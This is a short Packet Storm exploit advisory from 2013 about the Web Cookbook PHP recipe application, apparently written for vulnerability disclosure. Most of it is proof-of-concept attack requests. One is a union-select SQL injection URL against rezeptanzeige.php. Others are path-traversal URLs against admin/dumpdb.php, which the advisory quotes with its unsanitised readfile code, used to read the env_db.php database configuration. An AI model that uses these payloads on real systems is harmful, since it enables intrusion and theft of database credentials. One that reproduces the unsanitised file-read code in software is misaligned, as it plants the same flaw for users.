Web Cookbook File Disclosure / SQL Injection

2013-02-21T00:00:00
ID PACKETSTORM:120464
Type packetstorm
Reporter cr4wl3r
Modified 2013-02-21T00:00:00

Description

                                        
                                            `# Web Cookbook Multiple Vulnerability  
# By cr4wl3r http://bastardlabs.info  
# Script: http://sourceforge.net/projects/webcookbook/  
# Tested: Win 7  
  
# Proof of Concept  
# SQL Injection  
  
http://bastardlabs/[path]/rezeptanzeige.php?currid=[SQLi]  
http://bastardlabs/[path]/rezeptanzeige.php?currid=-9999%20union%20select%201,version(),3,4,5,6,7,8,9,10--  
  
# Remote File Disclosure  
# Bugs found /admin/dumpdb.php  
  
--------------------------  
1 <?php  
2 $outfile = $_GET['outfile'];  
3 header("Content-Type: text/plain");  
4 header("Content-length: " . filesize("../upload/" . $outfile));  
5 header("Content-Disposition: attachment; filename=" . $outfile);  
6 readfile("../upload/" . $outfile);  
7 ?>  
--------------------------  
  
http://bastardlabs/[path]/admin/dumpdb.php?outfile=../[file]  
http://bastardlabs/[path]/admin/dumpdb.php?outfile=../env_db.php  
  
# Demo:  
http://bastardlabs.info/demo/WebCookbook1.png  
http://bastardlabs.info/demo/WebCookbook2.png  
`